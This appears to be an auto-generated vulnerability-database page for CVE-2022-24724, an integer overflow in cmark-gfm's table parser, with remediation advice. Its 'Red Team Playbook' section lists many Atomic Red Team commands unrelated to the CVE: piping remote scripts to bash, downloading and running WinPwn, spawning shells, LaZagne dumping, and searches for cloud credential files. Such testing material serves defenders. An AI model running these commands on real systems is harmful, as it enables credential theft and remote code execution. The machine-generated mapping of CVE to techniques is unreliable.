CVE-2022-24724
Overview
This vulnerability is an integer overflow in the table row parsing function `row_from_string` within the table markdown extension of GitHub's cmark-gfm library. The flaw occurs when parsing table marker rows containing more than UINT16_MAX columns, causing an overflow during size calculation. This leads to heap memory corruption due to improper bounds handling in the affected parsing component.
Vulnerability Description
cmark-gfm is GitHub's extended version of the C reference implementation of CommonMark. Prior to versions 0.29.0.gfm.3 and 0.28.3.gfm.21, an integer overflow in cmark-gfm's table row parsing `table.c:row_from_string` may lead to heap memory corruption when parsing tables who's marker rows contain more than UINT16_MAX columns. The impact of this heap corruption ranges from Information Leak to Arbitrary Code Execution depending on how and where `cmark-gfm` is used. If `cmark-gfm` is used for rendering remote user controlled markdown, this vulnerability may lead to Remote Code Execution (RCE) in applications employing affected versions of the `cmark-gfm` library. This vulnerability has been patched in the following cmark-gfm versions 0.29.0.gfm.3 and 0.28.3.gfm.21. A workaround is available. The vulnerability exists in the table markdown extensions of cmark-gfm. Disabling the table extension will prevent this vulnerability from being triggered.
Impact
An attacker with the ability to supply markdown content to an application using vulnerable cmark-gfm versions can trigger heap corruption, potentially leading to information disclosure or arbitrary code execution. This requires the attacker to influence markdown rendering inputs, with no user interaction needed beyond supplying crafted markdown. The CVSS vector indicates network attack with low complexity and low privileges required (AV:N/AC:L/PR:L/UI:N), enabling remote code execution in affected environments.
Solution
Remediation requires upgrading cmark-gfm to versions 0.29.0.gfm.3 or 0.28.3.gfm.21 or later, as detailed in GitHub's security advisory GHSA-mc3g-88wq-6f4x and Fedora package announcements (e.g., messages Z55K6VNVKO2G5SNKRCQ2KDG5SKTX5PVV and TJBFIJEHJZEEDG6MO4MQHZYKUXELH77O). As a workaround, disabling the table markdown extension prevents exploitation. Users should follow vendor advisories for precise patching instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the cmark-gfm library arises from an integer overflow during the parsing of table rows, specifically within the `row_from_string` function in the `table.c` file. This flaw occurs when the number of columns in a table exceeds the maximum value representable by an unsigned 16-bit integer (UINT16_MAX). When this limit is surpassed, it can lead to heap memory corruption, which can have severe consequences depending on the context in which the library is utilized. The nature of this vulnerability allows for various forms of exploitation, ranging from information leaks to arbitrary code execution, particularly when the library is employed to render markdown content that may be controlled by remote users.
Exploitation of this vulnerability can occur through several attack vectors. For instance, an attacker could craft a malicious markdown document containing a table with an excessive number of columns and submit it to an application that utilizes the affected versions of cmark-gfm for rendering. If the application processes this document without adequate validation or sanitization, the resulting integer overflow could lead to memory corruption. This scenario is particularly concerning in web applications where user-generated content is common, as it opens the door for remote code execution (RCE). Attackers could leverage this capability to execute arbitrary code on the server, potentially leading to full system compromise.
The real-world impact of this vulnerability is significant, especially for organizations that rely on markdown rendering for user-generated content. The potential for RCE poses a critical business risk, as it could allow attackers to gain unauthorized access to sensitive data, disrupt services, or even take control of the underlying infrastructure. The severity of this risk is underscored by the high CVSS score of 9.8, indicating that the vulnerability is not only exploitable but also has the potential for catastrophic outcomes. Organizations using affected versions of the library must prioritize remediation to protect their assets and maintain the integrity of their systems.
To detect and mitigate this vulnerability, organizations should first assess their use of the cmark-gfm library and identify any applications that may be affected. Upgrading to the patched versions—0.29.0.gfm.3 or 0.28.3.gfm.21—is the most effective way to eliminate the risk. Additionally, organizations can implement a workaround by disabling the table extension in cmark-gfm, which would prevent the vulnerability from being triggered. Regular security audits and code reviews should also be conducted to ensure that any markdown rendering functionality is properly secured against potential exploits. Furthermore, employing input validation and sanitization techniques can help mitigate the risk of processing malicious markdown content.
In conclusion, the vulnerability in the cmark-gfm library presents a serious threat to applications that render user-controlled markdown content. The potential for heap memory corruption and subsequent arbitrary code execution necessitates immediate attention from affected organizations. By understanding the technical details, possible exploitation scenarios, and implementing robust detection and mitigation strategies, organizations can significantly reduce their risk exposure and safeguard their systems against this critical vulnerability.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Github | Cmark-Gfm | All |
cpe:2.3:a:github:cmark-gfm:*:*:*:*:*:*:*:*
|
|
|
Github | Cmark-Gfm | All |
cpe:2.3:a:github:cmark-gfm:*:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 34 |
cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 35 |
cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 36 |
cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-92 | Forced Integer Overflow |
45%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.